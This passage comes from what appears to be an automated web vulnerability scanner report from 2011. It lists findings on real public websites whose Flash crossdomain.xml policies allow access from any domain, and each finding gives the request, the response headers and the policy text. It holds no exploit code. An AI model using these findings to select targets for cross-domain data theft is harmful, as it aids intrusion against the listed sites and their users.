Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.theonion.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:14 GMT
Server: PWS/1.7.1.5
X-Px: ht-d brf iad-agg-n33.panthercdn.com
ETag: "122ed-cc-4819d1d3984c0"
Cache-Control: max-age=604800
Expires: Sun, 03 Apr 2011 13:09:36 GMT
Age: 520238
Content-Length: 204
Content-Type: application/xml
Last-Modified: Fri, 12 Mar 2010 16:35:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...
7.131. http://www.thisoldhouse.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thisoldhouse.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thisoldhouse.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:08 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...
7.132. http://www.time.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.time.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.time.com

Response

HTTP/1.1 200 OK
Server: Undisclosed-Webserver/0.1
Date: Sat, 02 Apr 2011 13:24:06 GMT
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Last-modified: Sat, 02 Apr 2011 13:24:06 GMT
Content-type: text/xml
Set-Cookie: PFUID=40ec37ca4d97237660041000ffffff9d; path=/; domain=.time.com; expires=Tue, 01-Jan-2035 00:00:00 GMT
Last-modified: Thu, 22 Jul 2010 20:05:55 GMT
Content-length: 218
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cro
...[SNIP]...
7.133. http://www.totalbeauty.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.totalbeauty.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.totalbeauty.com

Response

HTTP/1.0 200 OK
Date: Fri, 01 Apr 2011 19:18:23 GMT
Last-Modified: Tue, 22 Mar 2011 01:23:28 GMT
Accept-Ranges: bytes
Content-Length: 281
Content-Type: application/xml
_onnection: keep-alive
Via: CN-5000
Set-Cookie: cresist=43C93BCA00001F90; path=/
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policie
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
7.134. http://www.travelpod.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelpod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.travelpod.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:10 GMT
Server: Apache
Last-Modified: Tue, 10 Aug 2010 14:12:56 GMT
ETag: "145-48d78bac66a00"
Accept-Ranges: bytes
Content-Length: 325
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
7.135. http://www.urbanspoon.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.urbanspoon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.urbanspoon.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 02 Apr 2011 13:44:45 GMT
Content-Type: text/xml
Content-Length: 217
Last-Modified: Sun, 21 Dec 2008 22:23:18 GMT
Connection: close
Expires: Sat, 02 Apr 2011 14:14:45 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes

...<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cro
...[SNIP]...
7.136. http://www.ustream.tv/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ustream.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ustream.tv

Response

HTTP/1.0 200 OK
Server: Apache
Pragma: no-cache
X-RSRC: w24
Content-Type: application/xml; charset=UTF-8
Cache-Control: public, max-age=851
Expires: Sat, 02 Apr 2011 13:49:44 GMT
Date: Sat, 02 Apr 2011 13:35:33 GMT
Content-Length: 142
Connection: close

<cross-domain-policy>
               <allow-access-from domain="*" />
               <site-control permitted-cross-domain-policies="all"/>
           </cross-domain-policy>
7.137. http://www.vh1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vh1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vh1.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Wed, 22 Oct 2008 15:54:17 GMT
ETag: "13a9b68-387-459d98f7dbc40"
Accept-Ranges: bytes
Content-Length: 903
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 13:52:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.vh1.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mtvi.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.schematic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.traab.com" />
   <allow-access-from domain="*.bigfishgames.com" />
   <allow-access-from domain="*.gottempo.com" />
   <allow-access-from domain="*.vh1classic.com" />
   <allow-access-from domain="*.mtvnservices.com" />
   <allow-access-from domain="widgets.flux.com"/>
   <allow-access-from domain="*.flux.com"/>    
   <allow-access-from domain="*.flux-staging.com"/>
   <allow-access-from domain="*.scandalist.com"/>    
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...
7.138. http://www.videosurf.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videosurf.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.videosurf.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:16 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Thu, 31 Mar 2011 08:10:38 GMT
Accept-Ranges: bytes
Content-Length: 215
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross
...[SNIP]...
7.139. http://www.weather.gov/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weather.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:09 GMT
Server: Apache
Last-Modified: Thu, 17 Jun 2010 12:56:26 GMT
Accept-Ranges: bytes
Content-Length: 167
Cache-Control: max-age=900
Expires: Sat, 02 Apr 2011 13:47:09 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="SOAPAction"/>
</cross-domain-policy>
7.140. http://www.weatherbug.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weatherbug.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weatherbug.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2003.04.18T03:21-0400" exp "2004.04.18T12:00-0400" r (v 0 s 0 n 0 l 0))
P3P: CP="NOI DSP COR NID TAI STP UNI"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:44:05 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Tue, 12 Oct 2004 19:41:36 GMT
ETag: "4a25787c93b0c41:811"
Content-Length: 208

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...
7.141. http://www.webkinz.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webkinz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.webkinz.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 29 Mar 2011 20:40:26 GMT
ETag: "588614-117-49fa511ece280"
Accept-Ranges: bytes
Content-Length: 279
_onnection: close
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:51:11 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" />
<allow-access-from domain="*" to-ports="*" secure="false" />
<allow-http-request-he
...[SNIP]...
7.142. http://www.webmd.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webmd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.webmd.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Content-Location: http://www.webmd.com/crossdomain.xml
Last-Modified: Tue, 19 Aug 2008 19:19:28 GMT
Accept-Ranges: bytes
ETag: "060a57f302c91:d8b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:38:03 GMT
Connection: keep-alive

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...
7.143. http://www.wix.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wix.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wix.com

Response

HTTP/1.0 200 OK
X-Via-Node: sputnik5
Date: Sat, 02 Apr 2011 13:42:08 GMT
Server: Apache
Last-Modified: Thu, 01 Jul 2010 13:00:25 GMT
ETag: "49ac155-153-48a530dc86c40"
Accept-Ranges: bytes
Content-Length: 339
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:42:08 GMT
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="true"/>
...[SNIP]...
7.144. http://www.wowhead.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wowhead.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:27 GMT
Server: Apache
Last-Modified: Tue, 20 Jul 2010 16:55:56 GMT
ETag: "42e583-c8-48bd48f0a7f00"
Accept-Ranges: bytes
Content-Length: 200
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 13:33:27 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.145. http://www.wunderground.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:12 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 02 Dec 2010 17:47:34 GMT
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
7.146. http://www.xanga.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xanga.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.xanga.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml
Last-Modified: Tue, 12 Oct 2010 20:58:52 GMT
Accept-Ranges: bytes
ETag: "131c7b46506acb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:06:31 GMT
Connection: close
Content-Length: 282

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" header
...[SNIP]...
<allow-access-from domain="*" to-ports="80"/>
...[SNIP]...
7.147. http://www.yardbarker.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yardbarker.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yardbarker.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Sat, 02 Apr 2011 13:37:45 GMT
Content-Type: text/xml
Content-Length: 199
Last-Modified: Thu, 16 Jul 2009 00:25:33 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
7.148. http://www.yfrog.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yfrog.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yfrog.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Sat, 02 Apr 2011 13:27:19 GMT
Content-Type: text/xml
Connection: close
Content-Length: 1198
Last-Modified: Thu, 15 Jul 2010 21:31:01 GMT
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from headers="*" secure="false" domain="*.imageshack.us" />
<allow-http-requ
...[SNIP]...
7.149. http://www.younghollywood.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.younghollywood.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.younghollywood.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Mar 2011 20:59:59 GMT
ETag: "34003ca-914-49e9fd3e791c0"
Cache-Control: max-age=259200
Expires: Tue, 05 Apr 2011 13:42:08 GMT
Content-Type: application/xml
Content-Length: 2324
X-Varnish-IP: 192.168.100.142
Date: Sat, 02 Apr 2011 13:42:08 GMT
X-Varnish: 2005739098
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd" >
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*" to-ports="*"/>
   <allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.amgdgt.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adtechus.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.llnwd.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tremormedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.scanscout.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fbcdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hulu.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.google.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.googleadservices.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.typepad.com"/>
   <allow-access-from domain="*.google-analytics.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yieldmanager.com"/>
   <allow-access-from domain="*.scanscout.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="brightcove.vo.llnwd.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.admeld.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.redcated" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.media6degrees.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.videoegg.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adobe.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.macromedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.collective-media.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.admeld.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.facebook.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.twitter.com" secure="false"/>
...[SNIP]...
7.150. http://www.yourfilehost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yourfilehost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yourfilehost.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:02:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 14 May 2010 18:06:54 GMT
ETag: "578851f-cd-bd784b80"
Accept-Ranges: bytes
Content-Length: 205
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...
7.151. http://www.zillow.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zillow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zillow.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:35 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Cache-Control: max-age=1209600
Expires: Sat, 16 Apr 2011 13:36:35 GMT
ETag: W/"294-1246488758000"
Last-Modified: Wed, 01 Jul 2009 22:52:38 GMT
Content-Type: text/xml
Content-Length: 294
Set-Cookie: BIGipServertomcat_pool_0=3423341066.0.0000; path=/
Via: 1.0 www.zillow.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=2, max=71
Connection: close
Set-Cookie: BIGipServerapache_pool_0=2601257482.0.0000; path=/

<?xml version="1.0" encoding="utf-8" ?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
7.152. http://www.zoosnet.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zoosnet.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zoosnet.net

Response

HTTP/1.1 200 OK
Content-Length: 102
Content-Type: text/xml
Last-Modified: Thu, 15 May 2008 07:10:06 GMT
Accept-Ranges: bytes
ETag: "c669fab35ab6c81:a93"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:00:59 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.153. http://www.zvents.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zvents.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 02 Apr 2011 13:43:43 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Wed, 13 Feb 2008 03:19:32 GMT
Connection: keep-alive
Expires: Sun, 03 Apr 2011 13:43:43 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
7.154. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 02 Apr 2011 11:33:56 GMT
Expires: Sun, 03 Apr 2011 11:33:56 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 4215
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

